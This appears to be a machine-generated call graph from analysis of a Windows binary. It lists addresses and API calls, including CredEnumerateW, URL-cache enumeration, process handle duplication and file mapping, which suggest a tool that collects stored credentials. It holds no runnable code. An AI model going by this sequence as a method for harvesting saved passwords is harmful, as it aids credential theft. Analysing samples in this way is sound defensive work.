memset 38351->38620 38364 40b2cc 27 API calls 38354->38364 38365 445909 38355->38365 38367 4087b3 337 API calls 38356->38367 38358 445bca 38366 445c8b memset memset 38358->38366 38422 445cf0 38358->38422 38359 445b38 memset memset memset 38370 445bd4 38359->38370 38371 445b98 38359->38371 38360 445849 38820 40b1ab free free 38360->38820 38379 4459ac 38364->38379 38376 409d1f 6 API calls 38365->38376 38380 414c2e 14 API calls 38366->38380 38377 445621 38367->38377 38368 445585 38805 41366b FreeLibrary 38368->38805 38369 44589f 38821 40b1ab free free 38369->38821 38374 414c2e 14 API calls 38370->38374 38371->38370 38382 445ba2 38371->38382 38372 40b2cc 27 API calls 38384 445a4f 38372->38384 38387 445be2 38374->38387 38375 403335 38522 4452e5 45 API calls 38375->38522 38390 445919 38376->38390 38806 4454bf 20 API calls 38377->38806 38378 445823 38378->38360 38400 4087b3 337 API calls 38378->38400 38391 409d1f 6 API calls 38379->38391 38392 445cc9 38380->38392 38891 4099c6 wcslen 38382->38891 38383 4456b2 38808 40b1ab free free 38383->38808 38770 409d1f wcslen wcslen 38384->38770 38385->38339 38419 44594a 38385->38419 38398 40b2cc 27 API calls 38387->38398 38388 445d3d 38418 40b2cc 27 API calls 38388->38418 38389 445d88 memset memset memset 38401 414c2e 14 API calls 38389->38401 38822 409b98 GetFileAttributesW 38390->38822 38402 4459bc 38391->38402 38403 409d1f 6 API calls 38392->38403 38393 445879 38393->38369 38404 4087b3 337 API calls 38393->38404 38395 445bb3 38894 445403 memset 38395->38894 38396 445680 38396->38383 38643 4087b3 memset 38396->38643 38407 445bf3 38398->38407 38400->38378 38410 445dde 38401->38410 38887 409b98 GetFileAttributesW 38402->38887 38412 445ce1 38403->38412 38404->38393 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38823 40b6ef 38408->38823 38420 40b2cc 27 API calls 38410->38420 38911 409b98 GetFileAttributesW 38412->38911 38416 40b2cc 27 API calls 38424 445a94 38416->38424 38426 445c07 38417->38426 38427 445d54 _wcsicmp 38418->38427 38419->38342 38431 4459ed 38419->38431 38430 445def 38420->38430 38421 4459cb 38421->38431 38438 40b6ef 249 API calls 38421->38438 38422->38375 38422->38388 38422->38389 38423 445389 255 API calls 38423->38358 38775 40ae18 38424->38775 38425 44566d 38425->38338 38694 413d4c 38425->38694 38434 445389 255 API calls 38426->38434 38435 445d71 38427->38435 38499 445d67 38427->38499 38429 445665 38807 40b1ab free free 38429->38807 38436 409d1f 6 API calls 38430->38436 38431->38345 38472 445b22 38431->38472 38440 445c17 38434->38440 38912 445093 23 API calls 38435->38912 38443 445e03 38436->38443 38438->38431 38439 4456d8 38445 40b2cc 27 API calls 38439->38445 38446 40b2cc 27 API calls 38440->38446 38442 44563c 38442->38429 38448 4087b3 337 API calls 38442->38448 38913 409b98 GetFileAttributesW 38443->38913 38444 40b6ef 249 API calls 38444->38375 38450 4456e2 38445->38450 38451 445c23 38446->38451 38447 445d83 38447->38375 38448->38442 38809 413fa6 _wcsicmp _wcsicmp 38450->38809 38455 409d1f 6 API calls 38451->38455 38453 445e12 38460 445e6b 38453->38460 38467 40b2cc 27 API calls 38453->38467 38458 445c37 38455->38458 38456 445aa1 38459 445b17 38456->38459 38476 445ab2 memset 38456->38476 38490 409d1f 6 API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39159 404363 38556->39159 38559 40bf5d 39179 40440c 38559->39179 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39182 40bd5d 28 API calls 38572->39182 39183 404423 38572->39183 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39196 4135e0 38576->39196 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 413666 38591->38592 38592->38349 39199 4449b9 38593->39199 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39220 444972 GetVersionExW 38599->39220 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39224 444a85 42 API calls 38603->39224 38607->38602 38607->38603 39221 444aa5 42 API calls 38607->39221 39222 40a7a0 GetVersionExW 38607->39222 39223 444a85 42 API calls 38607->39223 38610 40399d 38609->38610 39225 403a16 38610->39225 38612 403a09 39239 40b1ab free free 38612->39239 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39236 40a02c CreateFileW 38614->39236 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39266 40414f memset 38634->39266 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39280 40b1ab free free 38637->39280 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39293 40a6e6 WideCharToMultiByte 38643->39293 38645 4087ed 39294 4095d9 memset 38645->39294 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39313 409b98 GetFileAttributesW 38668->39313 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39314 407fdf 75 API calls 38671->39314 39315 409b98 GetFileAttributesW 38672->39315 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39316 4082c7 198 API calls 38676->39316 39317 409b98 GetFileAttributesW 38677->39317 38680 408987 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39583 413f27 38700->39583 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39588 413959 38708->39588 39604 413ca4 38708->39604 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39618 40b1ab free free 38728->39618 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39619 40b1ab free free 38750->39619 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39620 409cea 38759->39620 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39623 414bb0 wcscpy 38764->39623 38765->38763 38767 414cd2 39624 4145ac RegQueryValueExW 38767->39624 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39625 409b98 GetFileAttributesW 38833->39625 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39626 40bb98 38836->39626 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39660 409a45 GetTempPathW 38842->39660 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39659 40a6e6 WideCharToMultiByte 38846->39659 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39672 424f26 122 API calls 38863->39672 38864 40b8bd memset 39663 425413 17 API calls 38864->39663 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39673 40a734 MultiByteToWideChar 38880->39673 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39664 4253ef 16 API calls 38885->39664 39665 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39665 39666 4253af 17 API calls 38885->39666 39667 4253cf 17 API calls 38885->39667 39668 447280 memset 38885->39668 39669 447960 memset memcpy memcpy memcpy 38885->39669 39670 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39670 39671 447920 memcpy memcpy memcpy 38885->39671 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39765 409b98 GetFileAttributesW 38898->39765 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39766 409b98 GetFileAttributesW 38906->39766 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39094 40a97a 38946->39094 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39099 40b1ab free free 38951->39099 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39100 40aa1d 38959->39100 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39102 405220 38971->39102 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 38983 40add4 2 API calls 38983->38985 38990 40e5ed memset memset 38984->38990 38985->38980 38985->38981 38985->38983 38986 40c231 _wcsicmp 38985->38986 38987 40c1d3 34 API calls 38985->38987 38986->38985 38988 40c248 38986->38988 38987->38985 39003 40c084 21 API calls 38988->39003 38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39093 40b1ab free free 39020->39093 39021->39020 39022 40e540 39022->39017 39070 40e2ab 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39071 40e2c2 39070->39071 39072 406b90 11 API calls 39071->39072 39083 40e2d3 39072->39083 39073 40e4a0 39074 4069a3 ??3@YAXPAX free 39073->39074 39076 40e4ab 39074->39076 39075 406e8f 13 API calls 39075->39083 39076->39022 39077 406b53 SetFilePointerEx ReadFile 39077->39083 39078 40e489 39079 40aa04 free 39078->39079 39080 40e491 39079->39080 39080->39073 39082 40e497 free 39080->39082 39081 40dd50 _wcsicmp 39081->39083 39082->39073 39083->39073 39083->39075 39083->39077 39083->39078 39083->39081 39084 40dd50 _wcsicmp 39083->39084 39087 40742e 8 API calls 39083->39087 39088 40e3e0 memcpy 39083->39088 39089 40e3fb memcpy 39083->39089 39090 40e3b3 wcschr 39083->39090 39091 40e416 memcpy 39083->39091 39092 40e431 memcpy 39083->39092 39085 40e376 memset 39084->39085 39086 40aa29 6 API calls 39085->39086 39086->39083 39087->39083 39088->39083 39089->39083 39090->39083 39091->39083 39092->39083 39093->39008 39095 40a980 39094->39095 39096 40a995 _wcsicmp 39095->39096 39097 40a99c wcscmp 39095->39097 39098 40a8bb 39095->39098 39096->39095 39097->39095 39098->38949 39098->38950 39099->38953 39101 40aa23 RegEnumValueW 39100->39101 39101->38962 39101->38963 39103 405335 39102->39103 39104 40522a 39102->39104 39103->38547 39105 40b2cc 27 API calls 39104->39105 39106 405234 39105->39106 39107 40a804 8 API calls 39106->39107 39108 40523a 39107->39108 39147 40b273 39108->39147 39110 405248 _mbscpy _mbscat GetProcAddress 39111 40b273 27 API calls 39110->39111 39112 405279 39111->39112 39150 405211 GetProcAddress 39112->39150 39114 405282 39115 40b273 27 API calls 39114->39115 39116 40528f 39115->39116 39151 405211 GetProcAddress 39116->39151 39118 405298 39119 40b273 27 API calls 39118->39119 39120 4052a5 39119->39120 39152 405211 GetProcAddress 39120->39152 39122 4052ae 39123 40b273 27 API calls 39122->39123 39124 4052bb 39123->39124 39153 405211 GetProcAddress 39124->39153 39126 4052c4 39127 40b273 27 API calls 39126->39127 39128 4052d1 39127->39128 39154 405211 GetProcAddress 39128->39154 39130 4052da 39131 40b273 27 API calls 39130->39131 39132 4052e7 39131->39132 39155 405211 GetProcAddress 39132->39155 39134 4052f0 39135 40b273 27 API calls 39134->39135 39136 4052fd 39135->39136 39156 405211 GetProcAddress 39136->39156 39138 405306 39139 40b273 27 API calls 39138->39139 39140 405313 39139->39140 39157 405211 GetProcAddress 39140->39157 39142 40531c 39143 40b273 27 API calls 39142->39143 39144 405329 39143->39144 39158 405211 GetProcAddress 39144->39158 39146 405332 39146->39103 39148 40b58d 27 API calls 39147->39148 39149 40b18c 39148->39149 39149->39110 39150->39114 39151->39118 39152->39122 39153->39126 39154->39130 39155->39134 39156->39138 39157->39142 39158->39146 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38559 39165->38561 39165->38562 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38576 39182->38572 39184 40447e 39183->39184 39185 40442e 39183->39185 39184->38572 39186 40b2cc 27 API calls 39185->39186 39187 404438 39186->39187 39188 40a804 8 API calls 39187->39188 39189 40443e 39188->39189 39190 404445 39189->39190 39191 404467 39189->39191 39192 40b273 27 API calls 39190->39192 39191->39184 39194 404475 FreeLibrary 39191->39194 39193 40444f GetProcAddress 39192->39193 39193->39191 39195 404460 39193->39195 39194->39184 39195->39191 39197 4135f6 39196->39197 39198 4135eb FreeLibrary 39196->39198 39197->38579 39198->39197 39200 4449c4 39199->39200 39201 444a52 39199->39201 39202 40b2cc 27 API calls 39200->39202 39201->38596 39201->38597 39203 4449cb 39202->39203 39204 40a804 8 API calls 39203->39204 39205 4449d1 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449dc GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449f3 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a04 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a15 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a26 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a37 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a48 GetProcAddress 39218->39219 39219->39201 39220->38607 39221->38607 39222->38607 39223->38607 39224->38598 39226 403a29 39225->39226 39240 403bed memset memset 39226->39240 39228 403ae7 39253 40b1ab free free 39228->39253 39229 403a3f memset 39233 403a2f 39229->39233 39231 403aef 39231->38614 39232 409d1f 6 API calls 39232->39233 39233->39228 39233->39229 39233->39232 39234 409b98 GetFileAttributesW 39233->39234 39235 40a8d0 7 API calls 39233->39235 39234->39233 39235->39233 39237 40a051 GetFileTime CloseHandle 39236->39237 39238 4039ca CompareFileTime 39236->39238 39237->39238 39238->38614 39239->38615 39241 414c2e 14 API calls 39240->39241 39242 403c38 39241->39242 39243 409719 2 API calls 39242->39243 39244 403c3f wcscat 39243->39244 39245 414c2e 14 API calls 39244->39245 39246 403c61 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c68 wcscat 39247->39248 39254 403af5 39248->39254 39251 403af5 20 API calls 39252 403c95 39251->39252 39252->39233 39253->39231 39255 403b02 39254->39255 39256 40ae18 9 API calls 39255->39256 39265 403b37 39256->39265 39257 403bdb 39259 40aebe FindClose 39257->39259 39258 40add4 wcscmp wcscmp 39258->39265 39260 403be6 39259->39260 39260->39251 39261 40a8d0 7 API calls 39261->39265 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39257 39265->39258 39265->39261 39265->39262 39265->39263 39265->39264 39267 409d1f 6 API calls 39266->39267 39268 404190 39267->39268 39281 409b98 GetFileAttributesW 39268->39281 39270 40419c 39271 4041a7 6 API calls 39270->39271 39272 40435c 39270->39272 39273 40424f 39271->39273 39272->38636 39273->39272 39275 40425e memset 39273->39275 39277 409d1f 6 API calls 39273->39277 39278 40a8ab 9 API calls 39273->39278 39282 414842 39273->39282 39275->39273 39276 404296 wcscpy 39275->39276 39276->39273 39277->39273 39279 4042b6 memset memset _snwprintf wcscpy 39278->39279 39279->39273 39280->38640 39281->39270 39285 41443e 39282->39285 39284 414866 39284->39273 39286 41444b 39285->39286 39287 414451 39286->39287 39288 4144a3 GetPrivateProfileStringW 39286->39288 39289 414491 39287->39289 39290 414455 wcschr 39287->39290 39288->39284 39292 414495 WritePrivateProfileStringW 39289->39292 39290->39289 39291 414463 _snwprintf 39290->39291 39291->39292 39292->39284 39293->38645 39295 40b2cc 27 API calls 39294->39295 39296 409615 39295->39296 39297 409d1f 6 API calls 39296->39297 39298 409625 39297->39298 